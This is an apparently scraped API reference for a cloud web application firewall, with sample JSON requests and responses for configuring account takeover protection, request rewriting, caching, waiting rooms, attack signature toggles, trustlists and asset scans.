| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (JsonProtection) |
| property name* additional property | any |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "file_list": [
- {
- "idx": 1,
- "name": "test_rule1",
- "url": "/1",
- "limit_check": true,
- "schema_valid": true,
- "filename": "json_schema.json"
}
]
}, - "file_test_rule1": "{binary}"
}{- "detail": "Module updated"
}Get the configuration of account takeover.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "auth_url": "/1",
- "logoff_url": "/2",
- "username": "aa",
- "password": "bb",
- "sess_id_name": "cc",
- "return_code": "200",
- "redirect_url": "/3",
- "response_body": "dd",
- "sess_fixation_protect": true,
- "cred_stuffing_protect": true
}
}
}Update the configuration of account takeover.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (AccountTakeover) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "auth_url": "/1",
- "logoff_url": "/2",
- "username": "aa",
- "password": "bb",
- "sess_id_name": "cc",
- "return_code": "200",
- "redirect_url": "/3",
- "response_body": "dd",
- "sess_fixation_protect": true,
- "cred_stuffing_protect": true
}
}{- "detail": "Module updated"
}| ep_id required | string The application ID, it can be obtained from List Applications API. |
| url | string Page URL |
{- "url": "/page/url/to/purge"
}{- "message": "Cache purge operation has been issued, which takes 5 minutes to take effect"
}Get the configuration of rewriting requests.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "x_forwarded_for": true,
- "source_port": true,
- "x_forwarded_port": true,
- "x_real_ip": true,
- "identify_original_ip": true,
- "x_header": "X-Forwarded-For",
- "rule_list": [
- {
- "idx": "1",
- "name": "a",
- "action": "rewrite-host",
- "rewrite_from": "1.1.1.1",
- "rewrite_to": "2.2.2.2"
}, - {
- "idx": "2",
- "name": "b",
- "action": "rewrite-url",
- "rewrite_from": "/1",
- "rewrite_to": "/2"
}, - {
- "idx": "3",
- "name": "c",
- "action": "rewrite-refer",
- "rewrite_from": "x",
- "rewrite_to": "y"
}, - {
- "idx": "4",
- "name": "e",
- "action": "redirect-301",
- "rewrite_from": ".*",
}, - {
- "idx": "5",
- "name": "f",
- "action": "redirect-host",
- "rewrite_from": "^test.com",
- "url_translation": true
}, - {
- "idx": "6",
- "name": "rewrite-header-advanced",
- "action": "rewrite-header-advanced",
- "host_filter": true,
- "host_expression": "^(test\\.com)$",
- "url_filter": true,
- "url_expression": "^/(.*)$",
- "referer_filter": true,
- "referer_expression": "^https://www\\.test-referer\\.com$",
- "protocol_filter": true,
- "protocol": "HTTP",
- "host_status": true,
- "rewrite_host": "test-1.com",
- "url_status": true,
- "rewrite_url": "/test/$1",
- "referer_status": true,
- "header_status": true,
- "insert_header_name": "Test-Header-Name",
- "insert_header_value": "testHeaderValue",
- "remove_header": [
- "X-Test-Header-1",
- "X-Test-Header-2",
- "X-Test-Header-3",
- "X-Test-Header-4"
]
}, - {
- "idx": "7",
- "name": "redirect-advanced",
- "action": "redirect-301-advanced",
- "host_filter": true,
- "host_expression": "^(test\\.com)$",
- "url_filter": true,
- "url_expression": "^/(.*)$",
- "referer_filter": true,
- "referer_expression": "^https://www\\.test-referer\\.com$",
- "protocol_filter": true,
- "protocol": "HTTP",
}
]
}
}
}Update the configuration of rewriting requests.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (RewritingRequests) |
{- "template": false,
- "configs": {
- "status": true,
- "x_forwarded_for": true,
- "source_port": true,
- "x_forwarded_port": true,
- "x_real_ip": true,
- "identify_original_ip": true,
- "x_header": "X-Forwarded-For",
- "rule_list": [
- {
- "idx": "1",
- "name": "a",
- "action": "rewrite-host",
- "rewrite_from": "1.1.1.1",
- "rewrite_to": "2.2.2.2"
}, - {
- "idx": "2",
- "name": "b",
- "action": "rewrite-url",
- "rewrite_from": "/1",
- "rewrite_to": "/2"
}, - {
- "idx": "3",
- "name": "c",
- "action": "rewrite-refer",
- "rewrite_from": "x",
- "rewrite_to": "y"
}, - {
- "idx": "4",
- "name": "e",
- "action": "redirect-301",
- "rewrite_from": ".*",
}, - {
- "idx": "5",
- "name": "f",
- "action": "redirect-host",
- "rewrite_from": "^test.com",
- "url_translation": true
}, - {
- "idx": "6",
- "name": "rewrite-header-advanced",
- "action": "rewrite-header-advanced",
- "host_filter": true,
- "host_expression": "^(test\\.com)$",
- "url_filter": true,
- "url_expression": "^/(.*)$",
- "referer_filter": true,
- "referer_expression": "^https://www\\.test-referer\\.com$",
- "protocol_filter": true,
- "protocol": "HTTP",
- "host_status": true,
- "rewrite_host": "test-1.com",
- "url_status": true,
- "rewrite_url": "/test/$1",
- "referer_status": true,
- "header_status": true,
- "insert_header_name": "Test-Header-Name",
- "insert_header_value": "testHeaderValue",
- "remove_header": [
- "X-Test-Header-1",
- "X-Test-Header-2",
- "X-Test-Header-3",
- "X-Test-Header-4"
]
}, - {
- "idx": "7",
- "name": "redirect-advanced",
- "action": "redirect-301-advanced",
- "host_filter": true,
- "host_expression": "^(test\\.com)$",
- "url_filter": true,
- "url_expression": "^/(.*)$",
- "referer_filter": true,
- "referer_expression": "^https://www\\.test-referer\\.com$",
- "protocol_filter": true,
- "protocol": "HTTP",
}
]
}
}{- "detail": "Module updated"
}Get the web cache policy and file compress rule.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "cache": {
- "status": true,
- "cache_timeout": 60,
- "timeout_type": "minutes",
- "allow_method": "GET,HEAD",
- "allow_return_code": "200",
- "allow_file_type": [
- "binary",
- "media",
- "picture"
], - "key_factor": [
- "arguments",
- "host",
- "method",
- "protocol",
- "url",
- "cookies"
], - "cookie_list": [
- {
- "idx": 1,
- "name": "_a"
}, - {
- "idx": 2,
- "name": "_b"
}
], - "rule_list": [
- {
- "idx": 1,
- "method": "any",
- "url": "/1",
- "bypass_arg": true,
- "bypass_arg_value": "a",
- "bypass_cookie": true,
- "bypass_cookie_value": "b"
}
]
}, - "compress": {
- "status": true,
- "content_type_list": [
- {
- "idx": 1,
- "type": "application/javascript"
}, - {
- "idx": 2,
- "type": "application/json"
}, - {
- "idx": 3,
- "type": "application/rss+xml"
}, - {
- "idx": 4,
- "type": "application/soap+xml"
}, - {
- "idx": 5,
- "type": "application/x-javascript"
}, - {
- "idx": 6,
- "type": "application/xml(or)text/xml"
}, - {
- "idx": 7,
- "type": "text/css"
}, - {
- "idx": 8,
- "type": "text/html"
}, - {
- "idx": 9,
- "type": "text/javascript"
}, - {
- "idx": 10,
- "type": "text/plain"
}
]
}
}
}
}Update the web cache policy and file compress rule.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (CachingAndCompression) |
{- "template": false,
- "configs": {
- "status": true,
- "cache": {
- "status": true,
- "cache_timeout": 60,
- "timeout_type": "minutes",
- "allow_method": "GET,HEAD",
- "allow_return_code": "200",
- "allow_file_type": [
- "binary",
- "media",
- "picture"
], - "key_factor": [
- "arguments",
- "host",
- "method",
- "protocol",
- "url",
- "cookies"
], - "cookie_list": [
- {
- "idx": 1,
- "name": "_a"
}, - {
- "idx": 2,
- "name": "_b"
}
], - "rule_list": [
- {
- "idx": 1,
- "method": "any",
- "url": "/1",
- "bypass_arg": true,
- "bypass_arg_value": "a",
- "bypass_cookie": true,
- "bypass_cookie_value": "b"
}
]
}, - "compress": {
- "status": true,
- "content_type_list": [
- {
- "idx": 1,
- "type": "application/javascript"
}, - {
- "idx": 2,
- "type": "application/json"
}, - {
- "idx": 3,
- "type": "application/rss+xml"
}, - {
- "idx": 4,
- "type": "application/soap+xml"
}, - {
- "idx": 5,
- "type": "application/x-javascript"
}, - {
- "idx": 6,
- "type": "application/xml(or)text/xml"
}, - {
- "idx": 7,
- "type": "text/css"
}, - {
- "idx": 8,
- "type": "text/html"
}, - {
- "idx": 9,
- "type": "text/javascript"
}, - {
- "idx": 10,
- "type": "text/plain"
}
]
}
}
}{- "detail": "Module updated"
}Get the configuration of waiting room of an application.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: 0123456789 The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "session_duration": 5,
- "total_active_users": 250,
- "enable_total_active_users": true,
- "new_users_per_min": 220,
- "enable_new_users_per_min": false,
- "path": "/url",
- "path-type": "regular",
- "bypass_rules": [
- {
- "idx": 1,
- "rule_type": "source-ip",
- "rule_value": "2.2.2.2"
}, - {
- "idx": 2,
- "rule_type": "source-ip",
- "rule_value": "2.2.2.5-2.2.2.9"
}, - {
- "idx": 3,
- "rule_type": "source-ip",
- "rule_value": "2001:0db8:85a3:0000:0000:8a2e:0370:7334"
}
]
}
}
}Update the configuration of waiting room of an application.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: 0123456789 The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (WaitingRoom) |
{- "template": false,
- "configs": {
- "session_duration": 5,
- "total_active_users": 250,
- "enable_total_active_users": true,
- "new_users_per_min": 220,
- "enable_new_users_per_min": false,
- "path": "/url",
- "path-type": "regular",
- "bypass_rules": [
- {
- "rule_type": "source-ip",
- "rule_value": "2.2.2.2"
}, - {
- "rule_type": "source-ip",
- "rule_value": "2.2.2.5-2.2.2.9"
}, - {
- "rule_type": "source-ip",
- "rule_value": "2001:0db8:85a3:0000:0000:8a2e:0370:7334"
}
], - "status": true
}
}{- "detail": "Module updated"
}Get the overview data of waiting room runtime.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: 0123456789 The application ID, it can be obtained from List Applications API. |
| widget required | string Enum: "overview" "current_active_users" "current_waiting_users" "current_new_users_per_min" "estimated_waiting_time" Example: widget=overview Widget name. |
| time_range | string Default: "1h" Enum: "1h" "24h" "7d" Example: time_range=24h Get data of specific time range. Default value is 1h which means last one hour. |
{- "result": {
- "current_active_users": 3000,
- "current_waiting_users": 1000,
- "current_new_users_per_min": 600,
- "estimated_waiting_time": 3
}
}Update the configuration of waiting room of an application.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: 0123456789 The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (WaitingRoom) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "sensitivity_level": 1,
- "sql_inject": true,
- "cross_site_script": true,
- "generic_attacks": true,
- "known_exploits": true,
- "trojans": true,
- "sig_except_rules": [
- {
- "idx": 1,
- "sig_name": "SQL Injection",
- "sig_id": "030000010",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "1",
- "status": true
}, - "cookie": {
- "type": "string",
- "value": "1",
- "status": false
}
}
], - "stack_sql_inject": true,
- "embed_sql_inject": true,
- "condition_sql_inject": true,
- "arithmetic_sql_inject": true,
- "line_comments": true,
- "sql_func_inject": true,
- "html_tag_xss_inject": true,
- "html_attr_xss_inject": true,
- "html_css_xss_inject": true,
- "js_func_xss_inject": true,
- "js_var_xss_inject": true,
- "stx_except_rules": [
- {
- "idx": 1,
- "attack_cat": "SQL Injection (Syntax Based Detection)",
- "attack_name": "Embedded Queries SQL Injection",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "1",
- "status": true
}, - "cookie": {
- "type": "string",
- "value": "1",
- "status": false
}
}
]
}
}{- "detail": "Module updated"
}Get the configuration of global trustlist parameter.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "configs": {
- "status": true,
- "trust_list": [
- {
- "idx": 1,
- "name": "Trust-Test",
- "status": true,
- "url": "/test"
}
]
}
}
}Update the configuration of global trustlist parameter.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
required | object (GlobalTrust) |
{- "configs": {
- "status": true,
- "trust_list": [
- {
- "idx": 1,
- "name": "Trust-Test",
- "status": true,
- "url": "/test"
}
]
}
}{- "detail": "Module updated"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string |
| action required | string |
| url | string URL of the asset. |
| uuid | string ID of the asset. |
{- "results": [
- {
- "asset_domain": "www.example.com",
- "auth_status": 1,
- "port": 443,
- "scan_progress": 0,
- "scan_status": 1,
- "threat_level": 0,
- "uuid": "1ca02a24-e6e5-43ac-8cef-8ae3d29fc5a2"
}
], - "details": "successfully",
- "status": "Success",
- "statusCode": 200,
- "_status": "enable"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string |
| action required | string |
{- "scan_type": 1,
- "uuid": "1ca02a24-e6e5-43ac-8cef-8ae3d29fc5a2"
}{- "detail": "successfully",
- "statusCode": 200
}